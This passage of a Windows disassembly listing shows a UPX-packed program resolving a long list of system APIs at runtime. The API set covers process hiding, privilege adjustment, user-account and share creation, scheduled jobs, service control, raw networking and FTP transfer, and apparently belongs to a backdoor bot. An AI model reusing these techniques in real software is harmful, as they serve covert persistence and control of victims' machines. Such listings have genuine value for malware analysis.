add esp, 10h
locret_40531A: ; CODE XREF: sub_4052FB+9�j
retn 4
sub_4052FB endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_405325 proc near ; CODE XREF: sub_40112C�j
mov eax, [ecx+8]
retn
sub_405325 endp
; =============== S U B R O U T I N E =======================================
sub_405329 proc near ; CODE XREF: sub_401032�j
mov al, [ecx+4]
retn
sub_405329 endp
; =============== S U B R O U T I N E =======================================
sub_40532D proc near ; CODE XREF: sub_401046�j
mov al, [ecx+5]
retn
sub_40532D endp
; ---------------------------------------------------------------------------
loc_405331: ; CODE XREF: UPX0:0040116D�j
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov esi, ecx
mov [ebp-4], eax
push eax
lea eax, [ebp-14h]
push 0
push eax
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push dword ptr [esi]
call dword_413E10 ; getsockname
movzx eax, byte ptr [ebp-0Dh]
push eax
add esi, 0Ch
movzx eax, byte ptr [ebp-0Eh]
push eax
movzx eax, byte ptr [ebp-0Fh]
push eax
movzx eax, byte ptr [ebp-10h]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call ds:dword_47B5FC ; sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4053A0 proc near ; CODE XREF: sub_4011FE�j
mov eax, [ecx]
retn
sub_4053A0 endp
; =============== S U B R O U T I N E =======================================
sub_4053A3 proc near ; CODE XREF: sub_401294�j
push ebx
push ebp
mov ebp, ds:dword_47B518
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; dword_47B518
mov esi, ds:dword_47B4F8
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4054D8
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; dword_47B4F8
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_413F70, eax
call esi ; dword_47B4F8
push offset aProcess32first ; "Process32First"
push edi
mov dword_413EC8, eax
call esi ; dword_47B4F8
push offset aProcess32next ; "Process32Next"
push edi
mov dword_413E9C, eax
call esi ; dword_47B4F8
push offset aModule32first ; "Module32First"
push edi
mov dword_413D70, eax
call esi ; dword_47B4F8
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_413D14, eax
call esi ; dword_47B4F8
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_413D3C, eax
call esi ; dword_47B4F8
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_413DD0, eax
call esi ; dword_47B4F8
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_413F14, eax
call esi ; dword_47B4F8
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_413F8C, eax
call esi ; dword_47B4F8
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_413D80, eax
call esi ; dword_47B4F8
push offset aGetcomputernam ; "GetComputerNameA"
push edi
mov dword_413D5C, eax
call esi ; dword_47B4F8
cmp dword_413F70, ebx
mov dword_413EFC, eax
jz short loc_4054B6
cmp dword_413EC8, ebx
jz short loc_4054B6
cmp dword_413E9C, ebx
jz short loc_4054B6
cmp dword_413D70, ebx
jz short loc_4054B6
cmp dword_413D3C, ebx
jz short loc_4054B6
cmp dword_413DD0, ebx
jz short loc_4054B6
cmp dword_413F14, ebx
jz short loc_4054B6
cmp dword_413F8C, ebx
jz short loc_4054B6
cmp dword_413D80, ebx
jz short loc_4054B6
cmp dword_413D5C, ebx
jz short loc_4054B6
cmp eax, ebx
jnz short loc_4054C0
loc_4054B6: ; CODE XREF: sub_4053A3+C5�j
; sub_4053A3+CD�j ...
mov dword_413F90, 1
loc_4054C0: ; CODE XREF: sub_4053A3+111�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; dword_47B4F8
cmp eax, ebx
mov dword_413EE0, eax
jz short loc_4054ED
push 1
push ebx
call eax
jmp short loc_4054ED
; ---------------------------------------------------------------------------
loc_4054D8: ; CODE XREF: sub_4053A3+1D�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413F94, eax
mov dword_413F90, 1
loc_4054ED: ; CODE XREF: sub_4053A3+12C�j
; sub_4053A3+133�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_47B4B0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405641
push offset aClosewindow ; "CloseWindow"
push edi
call esi ; dword_47B4F8
push offset aSendmessagea ; "SendMessageA"
push edi
mov dword_413DE4, eax
call esi ; dword_47B4F8
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_413F08, eax
call esi ; dword_47B4F8
push offset aIswindow ; "IsWindow"
push edi
mov dword_413EA8, eax
call esi ; dword_47B4F8
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_413E0C, eax
call esi ; dword_47B4F8
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_413F74, eax
call esi ; dword_47B4F8
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_413E50, eax
call esi ; dword_47B4F8
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_413E80, eax
call esi ; dword_47B4F8
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_413F00, eax
call esi ; dword_47B4F8
cmp dword_413DE4, ebx
mov dword_413DA4, eax
jz short loc_4055BB
cmp dword_413F08, ebx
jz short loc_4055BB
cmp dword_413EA8, ebx
jz short loc_4055BB
cmp dword_413E0C, ebx
jz short loc_4055BB
cmp dword_413F74, ebx
jz short loc_4055BB
cmp dword_413E50, ebx
jz short loc_4055BB
cmp dword_413E80, ebx
jz short loc_4055BB
cmp dword_413F00, ebx
jz short loc_4055BB
cmp eax, ebx
jnz short loc_4055C5
loc_4055BB: ; CODE XREF: sub_4053A3+1DA�j
; sub_4053A3+1E2�j ...
mov dword_413F98, 1
loc_4055C5: ; CODE XREF: sub_4053A3+216�j
push offset aEnumwindows ; "EnumWindows"
push edi
call esi ; dword_47B4F8
push offset aGetwindowinfo ; "GetWindowInfo"
push edi
mov dword_413F58, eax
call esi ; dword_47B4F8
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
push edi
mov dword_413E20, eax
call esi ; dword_47B4F8
push offset aShowwindow ; "ShowWindow"
push edi
mov dword_413D50, eax
call esi ; dword_47B4F8
push offset aIswindowvisibl ; "IsWindowVisible"
push edi
mov dword_413E24, eax
call esi ; dword_47B4F8
push offset aGetclassnamea ; "GetClassNameA"
push edi
mov dword_413E54, eax
call esi ; dword_47B4F8
cmp dword_413F58, ebx
mov dword_413F80, eax
jz short loc_40564C
cmp dword_413E20, ebx
jz short loc_40564C
cmp dword_413D50, ebx
jz short loc_40564C
cmp dword_413E24, ebx
jz short loc_40564C
cmp dword_413E54, ebx
jz short loc_40564C
cmp eax, ebx
jnz short loc_405656
jmp short loc_40564C
; ---------------------------------------------------------------------------
loc_405641: ; CODE XREF: sub_4053A3+159�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413F9C, eax
loc_40564C: ; CODE XREF: sub_4053A3+276�j
; sub_4053A3+27E�j ...
mov dword_413F98, 1
loc_405656: ; CODE XREF: sub_4053A3+29A�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ds:dword_47B4B0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405996
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; dword_47B4F8
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_413F2C, eax
call esi ; dword_47B4F8
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_413E2C, eax
call esi ; dword_47B4F8
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_413ECC, eax
call esi ; dword_47B4F8
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_413D54, eax
call esi ; dword_47B4F8
push offset aRegdeletekeya ; "RegDeleteKeyA"
push edi
mov dword_413DC8, eax
call esi ; dword_47B4F8
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_413DF8, eax
call esi ; dword_47B4F8
push offset aRegenumkeyexa ; "RegEnumKeyExA"
push edi
mov dword_413E64, eax
call esi ; dword_47B4F8
push offset aRegenumvaluea ; "RegEnumValueA"
push edi
mov dword_413DCC, eax
call esi ; dword_47B4F8
push offset aRegqueryinfoke ; "RegQueryInfoKeyA"
push edi
mov dword_413D68, eax
call esi ; dword_47B4F8
cmp dword_413F2C, ebx
mov dword_413E1C, eax
jz short loc_405731
cmp dword_413E2C, ebx
jz short loc_405731
cmp dword_413ECC, ebx
jz short loc_405731
cmp dword_413D54, ebx
jz short loc_405731
cmp dword_413DC8, ebx
jz short loc_405731
cmp dword_413DF8, ebx
jz short loc_405731
cmp dword_413E64, ebx
jz short loc_405731
cmp dword_413D68, ebx
jz short loc_405731
cmp eax, ebx
jnz short loc_40573B
loc_405731: ; CODE XREF: sub_4053A3+350�j
; sub_4053A3+358�j ...
mov dword_413FA0, 1
loc_40573B: ; CODE XREF: sub_4053A3+38C�j
push offset aOpenthreadtoke ; "OpenThreadToken"
push edi
call esi ; dword_47B4F8
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
mov dword_413DB0, eax
call esi ; dword_47B4F8
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_413E70, eax
call esi ; dword_47B4F8
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_413E34, eax
call esi ; dword_47B4F8
cmp dword_413DB0, ebx
mov dword_413F20, eax
jz short loc_40578B
cmp dword_413E70, ebx
jz short loc_40578B
cmp dword_413E34, ebx
jz short loc_40578B
cmp eax, ebx
jnz short loc_405795
loc_40578B: ; CODE XREF: sub_4053A3+3D2�j
; sub_4053A3+3DA�j ...
mov dword_413FA0, 1
loc_405795: ; CODE XREF: sub_4053A3+3E6�j
push offset aLsaopenpolicy ; "LsaOpenPolicy"
push edi
call esi ; dword_47B4F8
push offset aLsaenumerateac ; "LsaEnumerateAccountsWithUserRight"
push edi
mov dword_413D44, eax
call esi ; dword_47B4F8
push offset aLsalookupnames ; "LsaLookupNames2"
push edi
mov dword_413E8C, eax
call esi ; dword_47B4F8
push offset aLsaaddaccountr ; "LsaAddAccountRights"
push edi
mov dword_413E48, eax
call esi ; dword_47B4F8
push offset aLsaremoveaccou ; "LsaRemoveAccountRights"
push edi
mov dword_413EA0, eax
call esi ; dword_47B4F8
push offset aLsafreememory ; "LsaFreeMemory"
push edi
mov dword_413EB4, eax
call esi ; dword_47B4F8
push offset aLsaclose ; "LsaClose"
push edi
mov dword_413ED0, eax
call esi ; dword_47B4F8
push offset aLsantstatustow ; "LsaNtStatusToWinError"
push edi
mov dword_413D94, eax
call esi ; dword_47B4F8
cmp dword_413D44, ebx
mov dword_413E7C, eax
jz short loc_405839
cmp dword_413E8C, ebx
jz short loc_405839
cmp dword_413E48, ebx
jz short loc_405839
cmp dword_413EA0, ebx
jz short loc_405839
cmp dword_413EB4, ebx
jz short loc_405839
cmp dword_413ED0, ebx
jz short loc_405839
cmp dword_413D94, ebx
jz short loc_405839
cmp eax, ebx
jnz short loc_405843
loc_405839: ; CODE XREF: sub_4053A3+460�j
; sub_4053A3+468�j ...
mov dword_413FA4, 1
loc_405843: ; CODE XREF: sub_4053A3+494�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; dword_47B4F8
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_413E84, eax
call esi ; dword_47B4F8
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_413D2C, eax
call esi ; dword_47B4F8
push offset aControlservice ; "ControlService"
push edi
mov dword_413D30, eax
call esi ; dword_47B4F8
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_413DAC, eax
call esi ; dword_47B4F8
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_413DB4, eax
call esi ; dword_47B4F8
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_413D48, eax
call esi ; dword_47B4F8
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_413E38, eax
call esi ; dword_47B4F8
push offset aCreateservicea ; "CreateServiceA"
push edi
mov dword_413D34, eax
call esi ; dword_47B4F8
push offset aStartservicect ; "StartServiceCtrlDispatcherA"
push edi
mov dword_413F24, eax
call esi ; dword_47B4F8
push offset aImpersonatelog ; "ImpersonateLoggedOnUser"
push edi
mov dword_413F88, eax
call esi ; dword_47B4F8
push offset aLockservicedat ; "LockServiceDatabase"
push edi
mov dword_413F78, eax
call esi ; dword_47B4F8
push offset aQueryservicelo ; "QueryServiceLockStatusA"
push edi
mov dword_413D64, eax
call esi ; dword_47B4F8
push offset aChangeservicec ; "ChangeServiceConfig2A"
push edi
mov dword_413DEC, eax
call esi ; dword_47B4F8
push offset aUnlockserviced ; "UnlockServiceDatabase"
push edi
mov dword_413F7C, eax
call esi ; dword_47B4F8
push offset aRegisterserv_0 ; "RegisterServiceCtrlHandlerA"
push edi
mov dword_413EBC, eax
call esi ; dword_47B4F8
push offset aSetservicestat ; "SetServiceStatus"
push edi
mov dword_413EB8, eax
call esi ; dword_47B4F8
cmp dword_413E84, ebx
mov dword_413DD4, eax
jz short loc_4059A1
cmp dword_413D2C, ebx
jz short loc_4059A1
cmp dword_413D30, ebx
jz short loc_4059A1
cmp dword_413DAC, ebx
jz short loc_4059A1
cmp dword_413DB4, ebx
jz short loc_4059A1
cmp dword_413D48, ebx
jz short loc_4059A1
cmp dword_413E38, ebx
jz short loc_4059A1
cmp dword_413D34, ebx
jz short loc_4059A1
cmp dword_413F78, ebx
jz short loc_4059A1
cmp dword_413D64, ebx
jz short loc_4059A1
cmp dword_413DEC, ebx
jz short loc_4059A1
cmp dword_413F7C, ebx
jz short loc_4059A1
cmp dword_413EBC, ebx
jz short loc_4059A1
cmp dword_413EB8, ebx
jz short loc_4059A1
cmp eax, ebx
jnz short loc_4059AB
jmp short loc_4059A1
; ---------------------------------------------------------------------------
loc_405996: ; CODE XREF: sub_4053A3+2C2�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FA8, eax
loc_4059A1: ; CODE XREF: sub_4053A3+583�j
; sub_4053A3+58B�j ...
mov dword_413FA0, 1
loc_4059AB: ; CODE XREF: sub_4053A3+5EF�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; dword_47B518
mov edi, eax
cmp edi, ebx
jz loc_405A77
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; dword_47B4F8
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_413E78, eax
call esi ; dword_47B4F8
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_413EEC, eax
call esi ; dword_47B4F8
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_413EF4, eax
call esi ; dword_47B4F8
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_413EA4, eax
call esi ; dword_47B4F8
push offset aSelectobject ; "SelectObject"
push edi
mov dword_413D88, eax
call esi ; dword_47B4F8
push offset aBitblt ; "BitBlt"
push edi
mov dword_413D24, eax
call esi ; dword_47B4F8
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_413EF0, eax
call esi ; dword_47B4F8
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_413D10, eax
call esi ; dword_47B4F8
cmp dword_413E78, ebx
mov dword_413DC0, eax
jz short loc_405A82
cmp dword_413EEC, ebx
jz short loc_405A82
cmp dword_413EF4, ebx
jz short loc_405A82
cmp dword_413EA4, ebx
jz short loc_405A82
cmp dword_413D88, ebx
jz short loc_405A82
cmp dword_413D24, ebx
jz short loc_405A82
cmp dword_413EF0, ebx
jz short loc_405A82
cmp dword_413D10, ebx
jz short loc_405A82
cmp eax, ebx
jnz short loc_405A8C
jmp short loc_405A82
; ---------------------------------------------------------------------------
loc_405A77: ; CODE XREF: sub_4053A3+613�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FB0, eax
loc_405A82: ; CODE XREF: sub_4053A3+694�j
; sub_4053A3+69C�j ...
mov dword_413FAC, 1
loc_405A8C: ; CODE XREF: sub_4053A3+6D0�j
mov ebp, ds:dword_47B4B0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz loc_405D59
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; dword_47B4F8
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_413DDC, eax
call esi ; dword_47B4F8
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_413F68, eax
call esi ; dword_47B4F8
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_413D6C, eax
call esi ; dword_47B4F8
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_413D38, eax
call esi ; dword_47B4F8
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_413E18, eax
call esi ; dword_47B4F8
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_413E00, eax
call esi ; dword_47B4F8
push offset aSocket ; "socket"
push edi
mov dword_413DBC, eax
call esi ; dword_47B4F8
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_413F3C, eax
call esi ; dword_47B4F8
push offset aConnect ; "connect"
push edi
mov dword_413F60, eax
call esi ; dword_47B4F8
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_413E14, eax
call esi ; dword_47B4F8
push offset aInet_addr ; "inet_addr"
push edi
mov dword_413F48, eax
call esi ; dword_47B4F8
push offset aHtons ; "htons"
push edi
mov dword_413EE8, eax
call esi ; dword_47B4F8
push offset aHtonl ; "htonl"
push edi
mov dword_413E98, eax
call esi ; dword_47B4F8
push offset aNtohs ; "ntohs"
push edi
mov dword_413E94, eax
call esi ; dword_47B4F8
push offset aNtohl ; "ntohl"
push edi
mov dword_413D98, eax
call esi ; dword_47B4F8
push offset aSend ; "send"
push edi
mov dword_413D8C, eax
call esi ; dword_47B4F8
push offset aSendto ; "sendto"
push edi
mov dword_413EF8, eax
call esi ; dword_47B4F8
push offset aRecv ; "recv"
push edi
mov dword_413F18, eax
call esi ; dword_47B4F8
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_413EC0, eax
call esi ; dword_47B4F8
mov dword_413E60, eax
push offset aBind ; "bind"
push edi
call esi ; dword_47B4F8
push offset aSelect ; "select"
push edi
mov dword_413ED8, eax
call esi ; dword_47B4F8
push offset aListen ; "listen"
push edi
mov dword_413E74, eax
call esi ; dword_47B4F8
push offset aAccept ; "accept"
push edi
mov dword_413ED4, eax
call esi ; dword_47B4F8
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_413F50, eax
call esi ; dword_47B4F8
push offset aGetsockname ; "getsockname"
push edi
mov dword_413E68, eax
call esi ; dword_47B4F8
push offset aGethostname ; "gethostname"
push edi
mov dword_413E10, eax
call esi ; dword_47B4F8
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_413EB0, eax
call esi ; dword_47B4F8
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_413F40, eax
call esi ; dword_47B4F8
push offset aGetpeername ; "getpeername"
push edi
mov dword_413E30, eax
call esi ; dword_47B4F8
push offset aClosesocket ; "closesocket"
push edi
mov dword_413DB8, eax
call esi ; dword_47B4F8
push offset aShutdown ; "shutdown"
push edi
mov dword_413F5C, eax
call esi ; dword_47B4F8
cmp dword_413DDC, ebx
mov dword_413F54, eax
jz loc_405D64
cmp dword_413F68, ebx
jz loc_405D64
cmp dword_413D6C, ebx
jz loc_405D64
cmp dword_413E18, ebx
jz loc_405D64
cmp dword_413E00, ebx
jz loc_405D64
cmp dword_413DBC, ebx
jz loc_405D64
cmp dword_413F3C, ebx
jz loc_405D64
cmp dword_413F60, ebx
jz loc_405D64
cmp dword_413E14, ebx
jz loc_405D64
cmp dword_413F48, ebx
jz loc_405D64
cmp dword_413EE8, ebx
jz loc_405D64
cmp dword_413E98, ebx
jz loc_405D64
cmp dword_413E94, ebx
jz loc_405D64
cmp dword_413D98, ebx
jz short loc_405D64
cmp dword_413EF8, ebx
jz short loc_405D64
cmp dword_413F18, ebx
jz short loc_405D64
cmp dword_413EC0, ebx
jz short loc_405D64
cmp dword_413E60, ebx
jz short loc_405D64
cmp dword_413ED8, ebx
jz short loc_405D64
cmp dword_413E74, ebx
jz short loc_405D64
cmp dword_413ED4, ebx
jz short loc_405D64
cmp dword_413F50, ebx
jz short loc_405D64
cmp dword_413E68, ebx
jz short loc_405D64
cmp dword_413E10, ebx
jz short loc_405D64
cmp dword_413EB0, ebx
jz short loc_405D64
cmp dword_413F40, ebx
jz short loc_405D64
cmp dword_413E30, ebx
jz short loc_405D64
cmp dword_413F5C, ebx
jnz short loc_405D6E
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D59: ; CODE XREF: sub_4053A3+6FA�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FB8, eax
loc_405D64: ; CODE XREF: sub_4053A3+8A6�j
; sub_4053A3+8B2�j ...
mov dword_413FB4, 1
loc_405D6E: ; CODE XREF: sub_4053A3+9B2�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz loc_405E8D
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; dword_47B4F8
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_413DA0, eax
call esi ; dword_47B4F8
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_413D18, eax
call esi ; dword_47B4F8
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_413E4C, eax
call esi ; dword_47B4F8
push offset aFtpgetfilea ; "FtpGetFileA"
push edi
mov dword_413DE0, eax
call esi ; dword_47B4F8
push offset aFtpputfilea ; "FtpPutFileA"
push edi
mov dword_413D7C, eax
call esi ; dword_47B4F8
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_413F28, eax
call esi ; dword_47B4F8
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_413E5C, eax
call esi ; dword_47B4F8
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_413E04, eax
call esi ; dword_47B4F8
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_413D58, eax
call esi ; dword_47B4F8
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_413D4C, eax
call esi ; dword_47B4F8
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_413D60, eax
call esi ; dword_47B4F8
cmp dword_413DA0, ebx
mov ecx, dword_413E04
mov dword_413EDC, eax
jz short loc_405E69
cmp dword_413D18, ebx
jz short loc_405E69
cmp dword_413E4C, ebx
jz short loc_405E69
cmp dword_413DE0, ebx
jz short loc_405E69
cmp dword_413E5C, ebx
jz short loc_405E69
cmp ecx, ebx
jz short loc_405E69
cmp dword_413D58, ebx
jz short loc_405E69
cmp dword_413D4C, ebx
jz short loc_405E69
cmp dword_413D60, ebx
jz short loc_405E69
cmp eax, ebx
jnz short loc_405E73
loc_405E69: ; CODE XREF: sub_4053A3+A84�j
; sub_4053A3+A8C�j ...
mov dword_413FBC, 1
loc_405E73: ; CODE XREF: sub_4053A3+AC4�j
cmp ecx, ebx
jz short loc_405EA8
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; dword_413E04
cmp eax, ebx
mov dword_413E28, eax
jnz short loc_405EA8
jmp short loc_405EA2
; ---------------------------------------------------------------------------
loc_405E8D: ; CODE XREF: sub_4053A3+9D6�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FC0, eax
mov dword_413FBC, 1
loc_405EA2: ; CODE XREF: sub_4053A3+AE8�j
mov dword_413E28, ebx
loc_405EA8: ; CODE XREF: sub_4053A3+AD2�j
; sub_4053A3+AE6�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_405EF2
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; dword_47B4F8
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_413DF4, eax
call esi ; dword_47B4F8
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_413F84, eax
call esi ; dword_47B4F8
cmp dword_413DF4, ebx
mov dword_413D74, eax
jz short loc_405EFD
cmp dword_413F84, ebx
jz short loc_405EFD
cmp eax, ebx
jnz short loc_405F07
jmp short loc_405EFD
; ---------------------------------------------------------------------------
loc_405EF2: ; CODE XREF: sub_4053A3+B10�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FC8, eax
loc_405EFD: ; CODE XREF: sub_4053A3+B3F�j
; sub_4053A3+B47�j ...
mov dword_413FC4, 1
loc_405F07: ; CODE XREF: sub_4053A3+B4B�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz loc_405FFD
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; dword_47B4F8
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_413D40, eax
call esi ; dword_47B4F8
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_413D20, eax
call esi ; dword_47B4F8
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_413DA8, eax
call esi ; dword_47B4F8
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_413DE8, eax
call esi ; dword_47B4F8
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_413F4C, eax
call esi ; dword_47B4F8
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_413D90, eax
call esi ; dword_47B4F8
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_413D28, eax
call esi ; dword_47B4F8
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_413D1C, eax
call esi ; dword_47B4F8
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_413DC4, eax
call esi ; dword_47B4F8
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_413F04, eax
call esi ; dword_47B4F8
cmp dword_413D40, ebx
mov dword_413EAC, eax
jz short loc_406008
cmp dword_413D20, ebx
jz short loc_406008
cmp dword_413DA8, ebx
jz short loc_406008
cmp dword_413DE8, ebx
jz short loc_406008
cmp dword_413F4C, ebx
jz short loc_406008
cmp dword_413D90, ebx
jz short loc_406008
cmp dword_413D28, ebx
jz short loc_406008
cmp dword_413D1C, ebx
jz short loc_406008
cmp dword_413DC4, ebx
jz short loc_406008
cmp dword_413F04, ebx
jz short loc_406008
cmp eax, ebx
jnz short loc_406012
jmp short loc_406008
; ---------------------------------------------------------------------------
loc_405FFD: ; CODE XREF: sub_4053A3+B6F�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FD0, eax
loc_406008: ; CODE XREF: sub_4053A3+C0A�j
; sub_4053A3+C12�j ...
mov dword_413FCC, 1
loc_406012: ; CODE XREF: sub_4053A3+C56�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_406047
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; dword_47B4F8
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_413D78, eax
call esi ; dword_47B4F8
cmp dword_413D78, ebx
mov dword_413E88, eax
jz short loc_406052
cmp eax, ebx
jnz short loc_40605C
jmp short loc_406052
; ---------------------------------------------------------------------------
loc_406047: ; CODE XREF: sub_4053A3+C7A�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FD8, eax
loc_406052: ; CODE XREF: sub_4053A3+C9C�j
; sub_4053A3+CA2�j
mov dword_413FD4, 1
loc_40605C: ; CODE XREF: sub_4053A3+CA0�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_4060D0
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; dword_47B4F8
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_413F38, eax
call esi ; dword_47B4F8
push offset aGetiftable ; "GetIfTable"
push edi
mov dword_413F34, eax
call esi ; dword_47B4F8
push offset aGettcptable ; "GetTcpTable"
push edi
mov dword_413E58, eax
call esi ; dword_47B4F8
push offset aGetudptable ; "GetUdpTable"
push edi
mov dword_413E6C, eax
call esi ; dword_47B4F8
cmp dword_413F38, ebx
mov dword_413F10, eax
jz short loc_4060DB
cmp dword_413F34, ebx
jz short loc_4060DB
cmp dword_413E58, ebx
jz short loc_4060DB
cmp eax, ebx
jz short loc_4060DB
cmp dword_413E6C, ebx
jnz short loc_4060E5
jmp short loc_4060DB
; ---------------------------------------------------------------------------
loc_4060D0: ; CODE XREF: sub_4053A3+CC4�j
call ds:dword_47B4E4 ; RtlGetLastWin32Error
mov dword_413FE4, eax
loc_4060DB: ; CODE XREF: sub_4053A3+D0D�j
; sub_4053A3+D15�j ...
mov dword_413FDC, 1
loc_4060E5: ; CODE XREF: sub_4053A3+D29�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; dword_47B4B0
mov edi, eax
cmp edi, ebx
jz short loc_406144
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; dword_47B4F8
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_413F6C, eax
